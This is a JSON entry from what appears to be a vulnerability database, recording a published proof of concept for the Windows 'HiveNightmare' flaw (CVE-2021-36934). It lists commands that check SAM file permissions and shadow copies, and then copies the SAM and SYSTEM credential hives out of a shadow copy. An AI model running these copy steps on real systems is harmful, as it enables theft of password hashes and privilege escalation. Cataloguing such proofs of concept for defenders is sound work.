{"uuid": "83d811e9-ba70-4f2e-bc4a-ce3d9fcdf089", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2021-36934", "type": "published-proof-of-concept", "source": "https://t.me/is_n3ws/45", "content": "WINDOWS LPE \"HiveNightmare\" or \"SeriousSAM\"\nCVE-2021-36934\nThe problem is aggravated by the fact the 'shadow copy' of the system drive where these files can be found is created when someone performs a Windows Update if that drive is larger than 128GB (!). So, even if your version of Windows 10 wasn't initially impacted, it could be after updating.\n\n1) Check permissions:\nicacls.exe C:\\Windows\\System32\\config\\SAM\n\n2) Check shadow copies, restore points\n[System.IO.File]::Exists('\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SAM')\n[System.IO.File]::Exists('\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\System32\\config\\SAM')\n[System.IO.File]::Exists('\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy3\\Windows\\System32\\config\\SAM')\n... and so on\n\n3) Copy SAM and SYSTEM files from shadow copy:\n[System.IO.File]::Copy('\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SAM', 'C:\\Temp\\SAM')\n[System.IO.File]::Copy('\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM', 'C:\\Temp\\SYSTEM')", "creation_timestamp": "2021-07-21T15:18:22.000000Z"}